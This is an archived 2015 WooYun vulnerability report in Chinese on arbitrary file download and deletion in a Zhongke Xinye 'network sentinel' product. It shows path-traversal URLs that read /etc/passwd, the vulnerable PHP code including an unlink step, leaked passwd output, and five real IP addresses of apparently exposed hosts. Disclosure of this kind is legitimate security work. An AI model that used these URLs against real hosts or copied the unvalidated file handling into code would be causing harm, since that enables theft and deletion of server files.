当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108646

漏洞标题:中科新业网络哨兵任意文件下载/删除(2个)

相关厂商:中科新业

漏洞作者: 路人甲

提交时间:2015-04-20 17:28

修复时间:2015-07-23 11:24

公开时间:2015-07-23 11:24

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-20: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-04-27: 细节向第三方安全合作伙伴开放
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

中科新业网络哨兵任意文件下载/删除(2个)

详细说明:

/manage/include/downfile.php?gFileName=/etc/passwd
/manage/stgl/download.php?filename=/etc/passwd


造成漏洞的部分代码:

if ( is_readable( $gFilePath.$gFileName ) ){
echo $no_access_msg;
exit( );
}
if ( file_exists( $gFilePath.$gFileName ) ){
echo $not_find_file_msg;
exit( );
}
$gFile = fopen( $gFilePath.$gFileName, "r" );
header( "Content-Type: text/html; charset=utf-8" );
header( "Content-type: application/octet-stream" );
header( "Accept-Ranges: bytes" );
header( "Accept-Length: ".filesize( $gFilePath.$gFileName ) );
header( "Content-Disposition: attachment; filename=".$gFileName );
header( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
header( "Pragma: public" );
echo fread( $gFile, filesize( $gFilePath.$gFileName ) );
fclose( $gFile );
if ( $gIsNotDir == "Y" )
{
unlink( $gFilePath.$gFileName );
}


很明显该代码存在任意文件下载及任意文件删除(当gIsNotDir=Y时)。

漏洞证明:

https://219.134.131.240/manage/include/downfile.php?gFileName=/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin


5个案例:
https://219.134.131.240/manage/include/downfile.php?gFileName=/etc/passwd
https://218.246.71.229/manage/include/downfile.php?gFileName=/etc/passwd
https://218.26.227.5/manage/include/downfile.php?gFileName=/etc/passwd
https://222.22.224.3/manage/include/downfile.php?gFileName=/etc/passwd
https://124.164.234.204/manage/include/downfile.php?gFileName=/etc/passwd

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-24 11:22

厂商回复:

CNVD未直接复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无